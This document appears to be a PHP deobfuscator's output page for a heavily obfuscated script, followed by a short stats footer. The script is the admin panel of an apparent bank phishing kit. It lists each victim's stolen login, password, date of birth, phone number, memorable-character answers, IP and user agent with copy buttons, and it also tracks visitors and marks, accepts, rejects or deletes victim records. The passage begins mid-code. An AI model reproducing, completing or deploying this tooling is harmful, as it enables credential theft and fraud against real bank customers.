x74\157\156\x3e\xa\x9\11\x9\x9\x9\x9\11\x3c\57\144\x69\166\76\12\x9\x9\11\x9\x9\x9\74\57\144\x69\x76\76\xa\11\x9\x9\x9\11\74\x2f\144\151\166\76\12\11\x9\11\11\74\57\x66\x6f\x72\155\76\xa\x9\11\x9\74\57\x64\151\x76\x3e\x9\x9\x9\12\x9\11\11\xa\11\x9\11"; } } if (isset($_GET["\146\145\164\x63\150\x5f\x66\x69\156\151\163\x68\137\x6d\157\x64\x61\x6c\137\144\141\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\x4c\x45\103\124\x20\x2a\40\146\162\157\155\x20\x63\165\163\164\x6f\x6d\145\162\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\x73\162\x6c\x6f\147\x69\156"]; $usrpass = $value["\x75\163\162\x70\141\x73\163"]; $memchar1 = $value["\x6d\145\x6d\143\x68\x61\162\61"]; $memchar2 = $value["\x6d\x65\155\143\150\x61\x72\x32"]; $memchar3 = $value["\155\x65\x6d\x63\150\141\x72\63"]; $askchar1 = $value["\x61\163\153\x63\x68\141\x72\61"]; $askchar2 = $value["\141\163\153\x63\150\141\162\62"]; $askchar3 = $value["\141\163\153\143\150\141\x72\63"]; $phonenum = $value["\x70\x68\157\156\x65\x6e\x75\x6d"]; $fullmemo = $value["\x66\165\154\154\155\145\155\x6f"]; $usrdob = $value["\165\x73\162\144\x6f\142"]; $Char_one = $askchar1 . "\40\143\150\141\x72\141\143\x74\x65\162\40\x2d\40" . $memchar1; $Char_two = $askchar2 . "\40\x63\150\141\x72\x61\x63\x74\x65\x72\x20\x2d\x20" . $memchar2; $Char_three = $askchar3 . "\x20\x63\x68\x61\162\x61\x63\x74\x65\x72\40\x2d\40" . $memchar3; $expiry = $value["\x65\x78\x70\x69\x72\x79"]; $ip = $value["\x69\x70"]; $useragent = urldecode($value["\x75\163\145\162\141\x67\145\156\x74"]); echo "\12\x9\xa\x9\11\x9\x3c\x64\151\166\40\x63\x6c\141\x73\163\x3d\x27\155\157\x64\141\x6c\x20\146\141\x64\145\x27\40\151\x64\x3d\47\166\x69\x65\167\x6d\x6f\144\141\154\x5f\165\163\145\162\x69\144\137{$value["\151\144"]}\47\x20\164\141\x62\151\x6e\144\x65\x78\75\47\x2d\61\47\x20\162\x6f\154\x65\x3d\x27\144\x69\x61\154\x6f\x67\47\40\x73\164\171\154\145\x3d\x27\x6f\x70\141\x63\x69\164\171\72\x31\x20\41\x69\155\160\x6f\162\164\x61\156\x74\73\144\151\163\160\x6c\141\x79\72\x6e\x6f\156\145\x3b\150\x65\151\147\150\164\x3a\61\x30\60\45\73\157\166\145\x72\x66\154\157\167\72\163\x63\162\157\154\x6c\73\x27\x20\141\x72\151\x61\55\x6c\x61\x62\145\154\x6c\145\x64\142\x79\x3d\x27\x65\x78\141\155\x70\154\x65\115\157\x64\x61\x6c\114\x61\142\145\x6c\x27\40\141\162\151\141\55\150\x69\144\144\x65\156\x3d\47\x74\x72\165\145\47\76\xa\11\x9\x9\12\x9\11\11\x9\x3c\146\x6f\162\x6d\40\156\141\155\x65\x3d\47\x63\157\x6e\x66\151\x67\137\x66\x6f\162\155\137{$value["\x69\144"]}\47\40\x69\x64\x3d\47\x63\157\x6e\x66\x69\147\137\146\157\162\x6d\137{$value["\x69\x64"]}\x27\x20\x6d\145\x74\x68\157\x64\x3d\x27\x50\117\123\124\47\40\x61\x63\164\151\157\156\75\x27\47\40\x6e\157\x76\x61\154\x69\144\141\x74\x65\76\12\11\x9\x9\x9\74\x69\x6e\x70\165\164\x20\164\x79\160\145\x3d\x27\150\151\144\144\x65\156\x27\40\156\141\155\x65\x3d\47\165\x73\x65\x72\151\144\47\40\x76\x61\x6c\x75\145\75\47{$value["\151\144"]}\x27\x3e\12\x9\11\11\x9\x3c\144\x69\166\40\143\x6c\141\x73\x73\x3d\47\x6d\x6f\144\x61\154\x2d\x64\x69\141\x6c\x6f\147\x27\40\x72\x6f\154\x65\75\47\144\x6f\x63\165\x6d\145\156\x74\x27\40\x73\x74\171\x6c\145\x3d\47\155\x61\x72\147\x69\156\55\x74\x6f\160\x3a\62\x30\x25\73\155\141\170\55\x77\x69\144\164\150\x3a\61\60\x30\45\x3b\146\x6f\156\x74\55\x73\x69\172\x65\x3a\x31\x2e\62\x72\x65\155\x3b\x27\76\xa\11\11\x9\11\74\144\151\x76\40\143\154\x61\x73\x73\75\47\155\x6f\144\x61\x6c\55\x63\157\x6e\x74\x65\156\164\47\x20\x73\x74\x79\x6c\x65\75\x27\142\141\143\x6b\x67\x72\157\x75\156\144\55\x63\157\154\157\162\72\x20\x62\154\x61\x63\x6b\x3b\x27\76\12\x9\11\11\11\11\74\144\151\166\40\143\x6c\x61\163\x73\75\x27\155\x6f\144\141\x6c\55\150\x65\141\144\145\162\47\x20\x73\x74\171\154\145\75\x27\x62\x61\143\x6b\147\162\157\165\x6e\x64\x2d\x63\157\x6c\x6f\162\x3a\x23\x33\64\x34\x39\65\x45\x3b\x66\157\x6e\x74\x2d\163\151\172\x65\72\x32\56\67\x72\145\x6d\73\164\145\170\164\x2d\x61\x6c\x69\x67\x6e\x3a\x63\145\x6e\x74\x65\162\73\47\76\12\x9\11\11\x9\11\74\150\x35\40\143\154\x61\163\163\x3d\x27\x6d\157\144\x61\x6c\55\164\151\x74\x6c\x65\47\x20\x69\144\75\47\x65\170\x61\155\x70\154\145\x4d\x6f\144\x61\x6c\114\x61\142\145\154\47\x20\x73\x74\171\x6c\x65\75\47\143\x6f\154\x6f\x72\x3a\167\x68\151\164\145\73\x66\x6f\x6e\164\55\163\151\x7a\x65\x3a\x31\56\x32\x72\x65\155\47\x3e\x41\144\155\151\x6e\40\x43\157\x6e\164\x72\157\x6c\40\x28\x63\154\151\143\x6b\x20\157\x6e\40\x6c\157\147\x20\x74\157\x20\x61\x75\164\157\x2d\x63\x6f\160\x79\51\74\x2f\x68\65\76\xa\x9\x9\x9\11\x9\x3c\142\165\x74\164\157\x6e\40\x74\171\x70\x65\x3d\x27\142\x75\x74\x74\x6f\x6e\x27\x20\x63\x6c\x61\x73\163\x3d\47\x63\x6c\157\x73\145\x27\x20\x6f\x6e\x63\154\x69\x63\153\75\x27\143\x6c\x6f\x73\145\x5f\142\164\156\50\x29\x27\40\x20\141\x72\151\x61\55\x6c\141\x62\x65\x6c\x3d\47\103\x6c\157\163\x65\x27\76\xa\11\x9\x9\11\11\x9\74\x73\160\141\156\40\141\x72\x69\x61\x2d\x68\151\x64\144\145\156\x3d\x27\164\x72\x75\145\47\x20\163\x74\x79\154\x65\75\x27\x63\157\154\x6f\162\72\167\x68\x69\x74\x65\47\76\46\x74\x69\x6d\145\163\73\74\x2f\x73\x70\x61\156\x3e\xa\11\11\x9\x9\x9\74\57\142\x75\164\x74\x6f\x6e\x3e\xa\x9\x9\11\11\x9\x3c\x2f\x64\151\x76\76\xa\11\x9\x9\11\11\74\x64\151\x76\40\143\154\141\x73\x73\x3d\x27\155\x6f\144\141\154\x2d\x62\x6f\144\171\x27\x3e\xa\11\x9\11\11\11\x9\74\144\x69\166\x20\143\154\141\x73\163\75\x27\x66\x6f\x72\x6d\55\x67\162\157\x75\160\47\40\163\x74\171\154\145\75\47\155\x61\162\x67\x69\x6e\55\x62\x6f\164\164\x6f\x6d\x3a\61\x72\x65\x6d\47\76\xa\x9\11\11\x9\11\x9\11\x3c\x62\x72\x3e\12\xa\11\11\x9\11\11\11\11\74\144\151\x76\x20\143\x6c\141\x73\x73\x3d\47\144\x61\164\141\55\147\x72\157\165\160\47\76\12\11\x9\x9\11\11\x9\11\11\74\x6c\141\142\x65\x6c\x20\143\x6c\x61\x73\x73\75\47\x64\x61\164\x61\55\x6c\x61\142\x65\x6c\x27\76\125\163\x65\x72\x20\x49\104\74\57\154\x61\142\x65\154\x3e\12\x9\11\x9\x9\11\x9\11\11\74\x69\x6e\160\165\x74\x20\x6f\156\x63\154\151\x63\x6b\75\47\143\x6f\160\171\137\x62\164\x6e\x28\x74\x68\x69\x73\x29\47\x20\x63\154\141\x73\x73\75\47\146\157\162\155\55\143\157\156\164\x72\x6f\154\47\40\x72\x65\x61\144\157\156\x6c\x79\x20\166\x61\x6c\165\x65\x3d\x27{$usrlogin}\x27\x3e\xa\x9\x9\x9\x9\11\x9\x9\74\57\144\x69\166\76\12\11\x9\11\x9\x9\x9\11\74\144\151\166\x20\x63\x6c\141\x73\x73\75\x27\144\141\x74\141\55\x67\162\157\x75\160\47\x3e\12\11\11\x9\11\x9\11\11\x9\x3c\154\x61\x62\145\x6c\x20\143\x6c\141\x73\x73\75\x27\x64\x61\164\141\x2d\x6c\x61\142\145\x6c\47\76\120\x61\163\x73\74\57\154\x61\x62\145\x6c\76\xa\11\x9\11\x9\x9\x9\11\x9\74\151\x6e\160\165\x74\x20\x6f\156\143\154\151\143\153\75\47\x63\157\x70\171\x5f\142\164\x6e\x28\x74\150\151\163\x29\x27\x20\x63\154\141\163\x73\x3d\47\146\x6f\x72\x6d\55\143\157\x6e\x74\162\x6f\154\47\x20\162\x65\141\x64\x6f\156\154\x79\x20\166\x61\x6c\165\x65\x3d\x27{$usrpass}\47\x3e\xa\11\x9\11\x9\x9\x9\11\x3c\x2f\144\x69\x76\x3e\12\11\11\x9\x9\11\11\x9\74\144\x69\166\40\x63\154\x61\163\163\75\x27\x64\x61\x74\141\x2d\x67\162\157\165\x70\x27\x3e\12\x9\11\11\11\11\11\11\11\x3c\154\x61\x62\145\x6c\x20\143\x6c\141\163\163\x3d\47\x64\141\164\x61\x2d\x6c\141\x62\x65\x6c\47\x3e\104\117\102\x3c\57\154\141\x62\145\154\x3e\xa\x9\11\11\11\x9\11\11\11\74\151\156\x70\x75\164\x20\x6f\156\143\x6c\x69\x63\153\x3d\47\143\157\x70\171\x5f\142\x74\x6e\50\x74\x68\151\163\51\47\40\x63\154\141\x73\x73\x3d\x27\146\157\162\x6d\x2d\x63\x6f\156\x74\162\157\x6c\x27\x20\x72\x65\x61\144\x6f\x6e\x6c\171\x20\166\x61\x6c\x75\x65\75\x27{$usrdob}\47\76\xa\11\x9\11\11\11\x9\11\x3c\x2f\x64\x69\166\x3e\12\x9\11\11\11\11\x9\11\x3c\x64\x69\x76\40\143\x6c\x61\163\163\75\47\x64\x61\164\x61\x2d\147\x72\157\165\160\47\76\xa\x9\11\x9\x9\11\11\x9\x9\x3c\x6c\141\142\x65\x6c\x20\143\x6c\x61\163\163\75\47\x64\141\164\141\x2d\x6c\141\142\145\154\x27\76\x50\x68\157\156\x65\x20\x4e\x6f\x2e\x3c\x2f\154\x61\x62\x65\x6c\76\12\11\11\x9\11\x9\x9\x9\11\x3c\x69\x6e\x70\x75\164\x20\157\x6e\x63\154\151\x63\x6b\x3d\x27\143\157\160\171\137\142\164\x6e\x28\164\x68\x69\163\51\47\40\143\154\x61\x73\x73\75\47\x66\x6f\162\x6d\x2d\143\x6f\x6e\x74\x72\x6f\x6c\47\40\162\x65\141\144\x6f\156\154\x79\x20\x76\x61\x6c\x75\145\x3d\x27{$phonenum}\x27\x3e\xa\x9\x9\11\x9\x9\x9\x9\x3c\57\x64\151\x76\x3e\xa\11\11\x9\11\11\x9\11\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\47\144\141\x74\x61\x2d\x67\x72\x6f\x75\x70\47\76\xa\11\x9\11\11\x9\11\x9\x9\74\x6c\x61\142\145\x6c\x20\143\x6c\141\x73\163\75\x27\x64\x61\x74\x61\55\x6c\x61\x62\145\x6c\47\76\x43\150\141\162\40\x31\x3c\57\x6c\141\x62\x65\154\76\12\11\11\x9\x9\x9\x9\11\11\x3c\151\156\160\165\164\x20\x6f\156\143\x6c\x69\143\153\x3d\x27\143\157\160\171\x5f\142\x74\156\50\x74\150\151\x73\x29\x27\40\x63\154\x61\x73\163\75\x27\146\x6f\x72\x6d\55\143\x6f\156\x74\162\x6f\154\x27\x20\x72\145\141\144\157\x6e\154\x79\40\166\x61\154\165\x65\75\47{$Char_one}\47\x3e\xa\11\11\11\x9\11\11\x9\74\x2f\144\151\166\76\12\x9\x9\x9\11\x9\x9\x9\x3c\144\x69\166\x20\x63\154\x61\x73\x73\x3d\47\144\x61\164\141\x2d\x67\162\157\165\160\x27\76\xa\x9\x9\x9\11\11\x9\x9\x9\x3c\x6c\141\x62\x65\154\40\x63\x6c\141\163\163\x3d\47\144\x61\164\x61\x2d\x6c\x61\x62\145\x6c\47\76\x43\x68\141\162\40\x32\74\57\154\x61\142\x65\154\76\12\11\x9\11\11\11\x9\x9\11\74\x69\x6e\x70\x75\x74\x20\157\156\x63\x6c\x69\x63\153\x3d\47\143\x6f\x70\x79\137\x62\x74\x6e\x28\164\x68\x69\163\51\x27\x20\x63\x6c\141\x73\x73\x3d\47\x66\157\162\155\55\143\157\x6e\x74\x72\157\x6c\x27\x20\162\145\141\x64\x6f\x6e\154\171\x20\166\x61\154\x75\145\75\47{$Char_two}\47\76\xa\x9\x9\11\x9\x9\x9\11\x3c\57\x64\x69\166\76\xa\x9\11\x9\x9\11\x9\11\74\144\x69\x76\x20\x63\x6c\141\x73\x73\75\47\144\x61\164\x61\x2d\x67\162\x6f\x75\x70\x27\76\12\x9\x9\11\11\x9\11\x9\x9\74\154\x61\x62\145\x6c\x20\143\x6c\141\x73\x73\x3d\47\x64\141\164\x61\x2d\x6c\x61\x62\145\154\47\76\103\x68\141\162\x20\x33\74\57\154\141\x62\x65\x6c\76\12\11\x9\11\11\11\x9\x9\x9\x3c\x69\156\x70\165\x74\40\157\x6e\x63\x6c\x69\143\153\75\47\143\157\x70\171\137\x62\164\x6e\x28\164\x68\151\x73\51\x27\x20\x63\154\141\x73\x73\x3d\x27\146\157\162\x6d\x2d\x63\x6f\156\x74\x72\157\x6c\47\40\162\145\x61\x64\157\x6e\x6c\171\x20\x76\x61\154\x75\x65\x3d\47{$Char_three}\x27\x3e\xa\x9\11\x9\11\x9\x9\11\x3c\x2f\x64\x69\x76\76\xa\x9\11\11\11\x9\11\11\x3c\144\151\166\40\x63\154\141\163\163\75\x27\144\141\164\141\x2d\147\162\157\165\160\47\x3e\xa\11\x9\x9\x9\x9\x9\11\11\x3c\154\141\142\145\x6c\40\x63\154\x61\163\163\x3d\47\x64\141\x74\x61\55\x6c\141\142\x65\x6c\47\x3e\x46\x75\x6c\x6c\x20\x4d\x65\x6d\157\74\x2f\x6c\x61\x62\x65\154\x3e\xa\x9\11\x9\x9\x9\11\x9\11\x3c\x69\x6e\x70\165\164\x20\x6f\156\143\x6c\x69\143\153\x3d\47\143\157\160\x79\x5f\142\164\156\x28\x74\x68\151\x73\51\47\x20\x63\154\141\163\x73\x3d\47\146\x6f\162\x6d\x2d\143\157\156\164\x72\x6f\x6c\47\x20\x72\x65\141\x64\157\x6e\x6c\x79\x20\x76\x61\154\x75\x65\75\47{$fullmemo}\47\x3e\12\11\x9\x9\x9\x9\11\x9\x3c\57\144\x69\x76\x3e\xa\x9\11\11\11\11\11\x9\x3c\x64\151\x76\x20\x63\154\x61\163\163\75\x27\x64\x61\x74\141\55\x67\x72\157\x75\160\47\76\xa\x9\x9\11\11\11\x9\x9\11\74\154\x61\x62\145\x6c\40\143\x6c\141\x73\x73\75\47\144\141\x74\141\55\154\x61\x62\145\x6c\x27\76\111\x50\57\x44\x65\x76\x69\143\x65\74\x2f\x6c\x61\x62\x65\x6c\76\xa\11\x9\11\11\x9\11\x9\11\x3c\151\156\x70\x75\164\x20\x6f\x6e\x63\x6c\151\143\153\x3d\47\143\157\x70\171\x5f\142\x74\x6e\x28\x74\x68\x69\x73\x29\47\x20\x63\x6c\141\163\163\75\x27\146\157\162\155\x2d\143\157\x6e\164\x72\157\154\x27\x20\x72\145\x61\x64\x6f\x6e\154\x79\40\x76\141\154\165\x65\75\47{$ip}\x20\x5b{$useragent}\x5d\x27\x3e\12\x9\11\11\11\x9\11\11\74\57\x64\151\x76\76\xa\x9\11\x9\11\x9\11\11\74\142\x72\x3e\12\11\x9\x9\11\x9\11\74\57\x64\x69\x76\x3e\xa\x9\x9\x9\11\x9\11\x9\xa\x9\x9\11\x9\11\x9\x3c\x21\x2d\x2d\x20\105\x4e\x44\x20\55\x2d\76\12\11\x9\11\11\11\12\x9\11\x9\11\11\x3c\x64\x69\166\x20\143\x6c\141\163\x73\75\47\x6d\x6f\x64\141\x6c\x2d\x66\157\x6f\x74\x65\x72\x27\40\163\x74\x79\x6c\x65\75\47\x6d\141\162\x67\x69\x6e\x2d\x74\157\x70\72\x2d\x34\60\160\x78\x27\x3e\xa\x9\11\x9\11\x9\74\142\x75\164\x74\157\x6e\x20\163\164\x79\154\145\75\x27\143\x6f\154\157\x72\x3a\142\x6c\x61\143\153\73\x62\141\143\153\x67\x72\157\165\156\x64\55\x63\x6f\x6c\x6f\x72\72\x77\x68\x69\164\x65\47\40\164\x79\x70\x65\x3d\x27\142\x75\x74\x74\x6f\x6e\47\x20\x6f\x6e\143\154\x69\x63\153\x3d\x27\143\154\157\163\x65\x5f\x62\x74\156\x28\x29\x27\40\x63\x6c\141\x73\x73\75\x27\142\164\x6e\40\142\x74\x6e\55\154\x67\40\x62\x74\156\x2d\x64\x61\x72\x6b\40\143\x6f\154\x2d\61\62\x27\x20\76\x43\x4c\x4f\123\x45\74\x2f\142\165\164\x74\157\x6e\76\xa\11\11\11\x9\11\xa\x9\x9\11\11\x9\x3c\x2f\x64\151\x76\76\xa\x9\x9\11\xa\x9\x9\x9\x3c\x2f\144\x69\x76\76\xa\11\11\11\xa\11\x9\11\x3c\x2f\x64\x69\x76\x3e\xa\x9\11\11\x3c\x2f\144\x69\x76\x3e\xa\x9\11\x9\x3c\57\x64\151\x76\x3e\xa\11\x9\x9\74\x2f\146\157\162\x6d\76\12\11\x9\x9\x3c\x2f\x64\x69\x76\x3e\xa\11\x9\x9"; } } if (isset($_GET["\143\x6f\165\156\x74\x65\x72"])) { $ipFile = "\56\56\x2f\56\x2e\x2f\154\157\x67\163\57\x76\151\x73\x69\164\x73\56\164\170\164"; $activequery = mysqli_query($conn, "\123\105\x4c\105\103\x54\x20\x2a\40\x46\x52\117\x4d\x20\143\x75\163\164\x6f\155\145\162\x73\x20\x57\x48\105\x52\105\x20\163\x74\x61\x74\165\163\x20\x3c\x32\x30"); $completequery = mysqli_query($conn, "\123\x45\x4c\x45\103\124\x20\52\40\x46\x52\x4f\x4d\x20\143\165\163\x74\x6f\155\145\x72\x73\x20\x57\x48\x45\x52\x45\x20\x73\x74\x61\164\165\x73\x3d\62\x30"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("\x75\163\x65\x72\156\x75\155" => $userRows, "\141\x63\x74\151\166\x65\x6e\x75\x6d" => $activeRows, "\143\x6f\x6d\160\154\x65\x74\x65\144\x6e\165\x6d" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("\x73\x74\141\164\x73" => "\x65\162\162\x6f\x72")); } } if (isset($_GET["\166\x69\x73\x69\164\x6c\157\147"])) { $ipFile = "\56\56\57\x2e\x2e\x2f\154\157\x67\x73\x2f\166\x69\x73\151\164\157\162\x73\56\x74\170\x74"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("\166\151\163\151\164\157\162\154\x6f\147" => $logquery); echo json_encode($log); } else { echo json_encode(array("\163\164\x61\x74\163" => "\145\x72\x72\x6f\x72")); } } if (isset($_GET["\x62\x75\172\x7a\x6f\x66\146"])) { $query = mysqli_query($conn, "\x53\105\114\x45\103\124\x20\52\40\106\x52\117\x4d\40\143\x75\163\164\157\x6d\x65\162\x73\40\x57\x48\x45\x52\x45\40\x73\x74\x61\x74\165\x73\x3c\75\70"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["\x69\x64"]; $queryy = mysqli_query($conn, "\x55\x50\104\x41\124\x45\x20\x63\x75\x73\x74\157\x6d\x65\162\163\x20\123\x45\x54\40\142\165\x7a\172\145\x64\75\x31\40\127\110\x45\122\x45\x20\151\x64\x3d{$userid}"); if ($queryy) { $stat = "\x6f\153"; } else { $stat = "\x6e\157\x74\x6f\x6b"; } } if ($stat == "\x6f\153") { echo json_encode(array("\163\x74\x61\x74\165\163" => "\157\153")); } else { echo json_encode(array("\163\x74\141\164\x75\163" => "\x6e\157\x74\157\x6b")); } } else { echo json_encode(array("\163\164\x61\164\x75\x73" => "\156\157\x74\x6f\153")); } } if ($_GET["\x74\x79\x70\x65"] == "\144\145\x6c\x65\164\x65") { if ($_POST["\x75\163\145\x72\x69\144"] and numeric($_POST["\x75\x73\x65\162\151\x64"]) == true) { $userid = $_POST["\x75\x73\x65\162\x69\144"]; $query = mysqli_query($conn, "\x44\x45\114\105\x54\105\40\x46\122\x4f\115\x20\x63\x75\x73\x74\x6f\155\145\162\163\40\127\x48\105\122\105\x20\151\144\75{$userid}"); if ($query) { echo json_encode(array("\x73\x74\141\164\165\x73" => "\157\x6b")); } else { echo json_encode(array("\163\164\x61\164\x75\163" => "\156\157\164\157\153")); } } else { echo json_encode(array("\163\x74\141\164\165\163" => "\156\x6f\164\157\x6b\x6b")); } } if ($_GET["\164\x79\160\145"] == "\163\165\x62\x6d\151\x74\x74\145\144") { if ($_POST["\165\x73\145\162\151\144"] and numeric($_POST["\x75\x73\x65\x72\x69\x64"]) == true) { $userid = $_POST["\x75\x73\145\x72\x69\x64"]; $status = str_replace("\137{$userid}", '', $_POST["\163\164\x61\164\165\163"]); if ($status == "\x61\x63\x63\x65\x70\164") { $status = 11; } elseif ($status == "\162\x65\x6a\145\x63\x74") { $status = 12; } else { echo json_encode(array("\x73\164\x61\x74\165\x73" => "\x6e\x6f\x74\x6f\153")); } $query = mysqli_query($conn, "\125\x50\x44\101\124\x45\x20\143\165\163\x74\157\x6d\x65\x72\x73\40\123\105\124\x20\163\164\x61\x74\x75\x73\x3d{$status}\40\x57\x48\x45\x52\x45\40\x69\144\75{$userid}"); if ($query) { echo json_encode(array("\163\x74\x61\x74\165\x73" => "\157\153")); } else { echo json_encode(array("\x73\x74\x61\x74\165\163" => "\x6e\157\164\x6f\153")); } } else { echo json_encode(array("\163\x74\x61\x74\165\163" => "\156\157\x74\x6f\153\x6b")); } } } goto MUtFt; VEIzH: ?>

Function Calls

None

Variables

None

Stats

MD5 f2e7b3cb3f75ee519b1250325afaee77
Eval Count 0
Decode Time 108 ms